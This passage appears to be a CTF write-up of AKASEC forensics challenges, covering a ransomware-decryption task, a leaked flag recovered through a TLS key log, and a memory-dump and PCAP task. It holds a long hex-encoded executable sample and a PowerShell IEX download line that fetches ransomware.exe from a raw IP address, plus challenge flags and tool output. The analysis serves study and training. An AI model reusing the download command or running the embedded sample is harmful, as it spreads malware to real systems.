HF5&HBE&H5F&H0E&HD9&H51&H59&H33&H7A&H77&H98&HC8&H27&H35&H0B&HB2&H4A&HCE&H82&H27&HF3&H76&HC4&HA5&H7E&HAD&H9B&HCD&H15&H49&H04&HC6&H4B&H32&H75&H13&H19&H72&H4E&H93&HD8&HDF&H0D&H53&H67&H40&HCC&HB9&HAA&H94&H1D&H42&H6E&HCB&H21&H1E&HD5&H07&H7A&H68&HDB&HB1&HED&H62&H64&H8B&HE5&HB8&HE4&H65&H93&H4A&H0D&HD8&H0C&H61&H2D&H2B&H60&H40&HEB&H11&HE6&H96&H23&HC8&H4E&H71&HDC&HB7&H03&HD6&H08&HE5&HFC&H18&HBE&H97&H47&H08&H47&HDF&H76&H5E&HB3&H47&H49&HFF&H28&H1E&H11&H9B&H3E&H42&H76&H84&HD2&H13&HD5&HC8&HA9&H97&HF8&HAC&H55&H26&H51&H72&HF3&H64&HB8&H13&H7D&HE8&HBC&H73&HBC&HD4&H2F&HCE&HA3&H58&H64&H9E&HAD&H3B&HB1&H2D&HB8&H94&HE5&H42&H5B&HD6&HAB&H08&HE6&H66&HEA&HB0&H3E&H30&H3C&HF1&H4B&H32&HED&HFD&H1D&H27&HB8&HDE&H83&H7B&H11&H9E&HE0&H7E&HAA&H58&HAC&H96&H82&H93&H62&HB1&HB3&HE1&HB7&H46&H21&H23&H4F&HDC&H26&HC7&HDD&HF0&H66&H43&H23&H62&H77&H11&H09&H49&HFB&H93&H5C&H5E&H8E&HA5&HB2&H95&HFF&HA2&HDA&HF1&H71&H3B&HDD&H5D&HB3&H46&H1E&H41&HBE&HF0&H6B&H6E&H73&H3C&H9C&H54&H07&H8A&H71&H61&H5B&H30&H28&H75&H82&HF7&H03&H2B&H2E&H9D&HFF&H2D&HED&HF7&H35&H1F&HC5&H88&H73&H26&H7A&HD1&H58&HDE&H76&H1C&HC2&HB3&H89&H81&H8E&HD1&HA2&H6B&HAD&HF1&H42&HE2&H76&H86&H0E&HB0&H6E&H17&H12&H3F&H51&H55&H42&H93&HB6&H1D&HD2&HCC&H05&H89&H74&H58&H7A&H3B&H3F&H1B&HBE&HF5&HDC&HC4&HC8&HDF&H8D&H4A&H53&H38&H85&HA8&H0C&H6A&H1A&HEC&HBA&H05&HF7&HA5&H4C&H3B&H38&HC9&HF9&H54&HAF&H0C&H0D&HAD&H72&H17&H84&H79&H33&HC9&H5B&HED&H0E&H60&H99&HBE&H8F&H43&H24&HBE&H59&HBD&H05&H48&HA2&H85&H43&H02&H18&H91&H3A&H01&H99&HEE&H8B&H04&HE3&H62&H59&HA7&H93&HD0&H41&H45&H3C&H2E&HA8&H72&H8D&H14&H26&H1D&H34&H37&HCC&HB8&H1C&H37&HF8&HD0&H8C&HE4&H34&HB9&HDE&H7E&H87&H92&H3A&HF3&H45&H71&HB2&H5F&H19&H4B&HC5&H3A&H09&HAD&H6E&H62&H00&H03&H63&H67&HCE&HA7&H98&H25&H5D&HA5&HA2&H8D&H88&H49&H61&H9E&HD5&H84&H00&HFD&H70&H52&H45&HDE&HFA&HE0&HAC&H01&H53&HE8&HE5&H22&H31&HF3&HBD&H27&HD8&H3A&HCE&H39&H90&H67&H2E&H3E&H48&HBB&H27&HCC&H17&H87&HD9&H2E&H88&H84&H97&H6F&H16&H6C&HE7&H50&HB3&H29&H8F&H94&HBF&H09&H98&H98&HAC&HCA&H9D&HC5&HD9&H1D&H35&HAF&H1B&H9C&HCE&H5C&H8B&HD6&H0D&H44&H49&H28&H71&H49&H45&H0B&HCC&HE6&H7F&H37&HB5&H03&HF7&H52&H08&H40&H18&H77&H54&H2F&H1C&H50&HF3&H6F&HFF&H0E&H35&HE9&H4B&H46&H90&H8F&H2C&HCE&HFF&HA8&H23&HA8&HCF&H80&H78&HB5&HBE&HC2&HE9&HD2&H2B&HF3&H8A&H4E&H4C&H3B&H8F&HB3&H01&HBF&H58&H07&HF8&H71&H9F&HC9&HCA&H10&H85&H83&H05&HC0&HB2&H44&HF6&HD3&H3A&HE3&HFD&H12&H0D&H5E&H90&H54&HA9&H57&H69&HA2&HCA&HBC&HF6&H5C&HA1&HF4&H37&HC3&H7D&HB1&H99&HCE&HC6&H7F&H0F&H4D&H71&H02&H61&HA2&HDD&H68&H33&H57&HE5&H15&H5F&H1C&H84&H90&H6C&HD8&H5A&H99&HD7&HC7&H25&H73&H8C&H0B&H2D&HF7&HB3&HD1&HA0&HEF&HCD&H83&H64&H04&HA5&H26&H66&HC0&HC0&H6C&H1B&HDC&H9A&H51&H02&H28&HF0&H28&HB6&H06&HE3&H83&H00&HE1&HBC&H78&H69&HCF&H1F&HB0&H51&H17&H33&H1E&HE4&H39&HCB&H19&H94&H9C&HB5&H62&H9F&H4D&HDD&H4E&HAC&HEE&H55&HF4&HAB&H52&H06&HAF&H30&H69&HFE&H1F&H60&H4A&H60&HCF&H46&H3F&H7A&H1C&H51&H75&HC4&HE4&HEF&H44&H40&H03&H5E&H8F&H56&H7A&H0E&HE6&H26&H98&H7F&H80&H77&H15&HE8&H1A&H7D&HFE&HF3&H16&H7C&HB0&HC4&H36&HF2&H9D&H56&H38&H65&H8F&H9D&H43&H7F&HCA&H04&H21&H11&H7E&H9B&HF9&H40&H0A&H7C&H1E&H39&H23&H1E&HF9&H3C&HC2&H3E&H4E&HC7&HCA&HF5&H57&H2A&H11&HA1&H9D&H55&H4D&HC0&HE0&HC6&H9A&H5C&H61&HCF&HB1&H69&H13&H03&H8B&H37&H32&HAA&H87&H7D&HF3&HC3&H56&HFC&HDB&H59&H1F&H87&H0B&HA7&H68&H76&HB7&H69&HCE&H53&H82&H68&H43&H70&H23&HFA&H33&H8E&H80&HDC&H7C&H44&HBF&H90&H65&HFA&H10&H6B&HF6&H4B&H4E&HA4&H6C&H4E&HED&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00
&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H2C&H30&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H54&H30&H00&H00&H38&H30&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H30&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H30&H00&H00&H00&H00&H00&H00&H9C&H00&H45&H78&H69&H74&H50&H72&H6F&H63&H65&H73&H73&H00&H00&H00&H00&H30&H00&H00&H4B&H45&H52&H4E&H45&H4C&H33&H32&H2E&H64&H6C&H6C&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H0D&HB5&HFF&HCF&H94&H89&H9F&H4D&H2E&H57&HED&H5D&HA2&H6F&H5E&H29&H99&H50&H8A&HEC&H28&HD7&HB7&HF9&H00&HA1&HFB&HC1&HCA&H37&H8D&HB4&HAD&H81&H9F&H41&H8C&H5C&HCE&H11
Decoding the hidden text, an exe file can be obtained.
Running the exe file on AnyRun, it seems that it performed a powershell command to fetch another exe file into the system.
1
powershell "IEX(New-Object Net.webClient).downloadString('http://20.81.130.178:8080/ransomware.exe')"
Downloading the exe via URL, we can analyze ransomware.exe
further with dnSpy or dotPeek. Shoutout to @0x157 and @Nex0 for his professional malware analysis skills. He managed to find the function that encrypts files and images using the 3DES encryption method.
Fortunately, we can find the key hardcoded into the program right above the IV bytes.
With the key and the IV bytes, we can decrypt the images and obtain the flag.
Sharing Is Not Caring 👃 [Forensics]
Question: My friends and I use the same computer on campus and have a shared folder to exchange files. After submitting the flag for the challenge, it was leaked, and someone obtained it without my knowledge. I’m unsure how they got it.
Flag: AKASEC{B4s1c_M4lw4r3_4nd_PC4P_4n4lys1s}
We are given an AD1 image and a PCAP file to investigate. Shoutout to @Vivi’s_Ghost and @Abdelrhman for collaborating with me in solving this challenge. Analyzing the PCAP, several protocols can be identified including DNS, TLS and HTTP. Reading the description, it seems that the flag submitted for the student’s challenge was leaked. Filtering the PCAP with the word flag
, the flag submission website can be found but not the leaked flag. It seems that the flag might be encrypted as a TLS packet so we might need to find the keys for it.
So we started our search on the AD1 image to look for the keys.
After spending a few minutes, @Vivi’s_Ghost managed to find suspicious activity in the Powershell logs located in C:\Users\yuno miles\AppData\Roaming\Microsoft\Windows\Powershell\PSReadLine
Reading the logs, it seems that the sslkey.log
file was moved to C:\Users\Public\Document\Internet Explorer\SIGNUP\
. However, checking the path, the file was still missing. We then tried to find the lnk file for the sslkey.log
and analyze it for more information.
Analyzing the metadata, we can see that the file was actually placed in C:\Users\Public\Document\Internet Explorer\SIGNUP\ink\
.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
└─$ exiftool sslkey.lnk
ExifTool Version Number : 12.76
File Name : sslkey.lnk
Directory : .
File Size : 1404 bytes
File Modification Date/Time : 2024:05:29 17:53:08-04:00
File Access Date/Time : 2024:06:12 11:25:56-04:00
File Inode Change Date/Time : 2024:05:29 17:53:08-04:00
File Permissions : -rwxrwxrwx
File Type : LNK
File Type Extension : lnk
MIME Type : application/octet-stream
Flags : IDList, LinkInfo, RelativePath, WorkingDir, Unicode, NoKnownFolderTracking
File Attributes : Archive
Create Date : 2024:05:29 17:18:58-04:00
Access Date : 2024:05:29 17:50:01-04:00
Modify Date : 2024:05:29 17:39:17-04:00
Target File Size : 161530
Icon Index : (none)
Run Window : Normal
Hot Key : (none)
Target File DOS Name : sslkey.log
Drive Type : Fixed Disk
Drive Serial Number : BC34-489A
Volume Label :
Local Base Path : C:\Users\Public\Documents\Internet Explorer\SIGNUP\ink\sslkey.log
Relative Path : ..\..\..\..\..\..\Public\Documents\Internet Explorer\SIGNUP\ink\sslkey.log
Working Directory : C:\Users\Public\Documents\Internet Explorer\SIGNUP\ink
Machine ID : desktop-i9hvfip
Importing the key file to Wireshark, the TLS stream can be decrypted and the flag can be obtained.
Snooz [Forensics]
Question: don’t wake me up, I want a snooze u will find everything on my laptop!!
Flag: AKASEC{05-10-2023_free_palestine}
We are given a memory dump and PCAP file to investigate. Analyzing the PCAP, several protocols can be identified, but the one that stood out the most was the HTTP stream. It seems that there was a suspicious file being transmitted over the network.
Decoding the suspicious file provides another malicious program that can be analyzed on dnSpy.
Shoutout to @0x157 again for his malware analysis skills. We can find a hard-coded string fr33___p4l3571n3
within a function that listens to TCP port 1337. The encryption also seems to be AES-ECB, hence an IV will not be required.
Checking the pcap for this port, there seems to be small encoded data in each stream.
1
2
└─$ tshark -r snooz_chall/snooz.pcapng -Y 'tcp.dstport == 1337' -T fields -e data | tr -d '\n'
12c6b9acfc4f81810dd21f652bbfd6af12c6b9acfc4f81810dd21f652bbfd6af6f3171b1be6ae86b058cbee8887f29a361d21ef8f12ff0594c4d217a3feef8a7d993e4c7bb1fea531af0e6259c4b466629e89109ed1d5ba3f3534dacc171266613ae8d24b73bef16426d079dd1d630011899962bd6e1cf2e574ebce9cc224f626fc58fea72add0be454ab6294fe2df119cce1284440e409fc07aa482de82a1b20e449b0133eed2e00a240569c4650ffa
The decrypted text seems to be mentioning something about pastecode. Finding the URL in the memory dump, we can use the password to uncover the secret code.
1
2
3
4
5
6
7
8
└─$ strings snooz_chall/memdump.mem | grep pastecode
\id=d58faa36-fd6c-4d85-832a-0fef9b5b7025 https://pastecode.io/s/9oz9u9h4
\id=d58faa36-fd6c-4d85-832a-0fef9b5b7025 https://pastecode.io/s/9oz9u9h4
-4d85-832a-0fef9b5b7025 https://pastecode.io/s/9oz9u9h4
aa36-fd6c-4d85-832a-0fef9b5b7025 https://pastecode.io/s/9oz9u9h4
\id=d58faa36-fd6c-4d85-832a-0fef9b5b7025 https://pastecode.io/s/9oz9u9h4ManagedPosition=DeviceId:\\?\DISPLAY#Default_Monitor#4&17f0ff54&0&UID0#{e6f07b5f-ee97-4a90-b076-33f57bf4eaa7};Position=682,50;Size=320,320Yellow26ca61a2-0663-47cf-9ba9-95e61a6be8c10347e22a-acbf-431b-9a0b-6873fdb426ad
\id=d58faa36-fd6c-4d85-832a-0fef9b5b7025 https://pastecode.io/s/9oz9u9h4
--- SNIP ---
The secret code seems to be encoded again, decoding it gives a password-protected zip file that contains an image of the flag.
1
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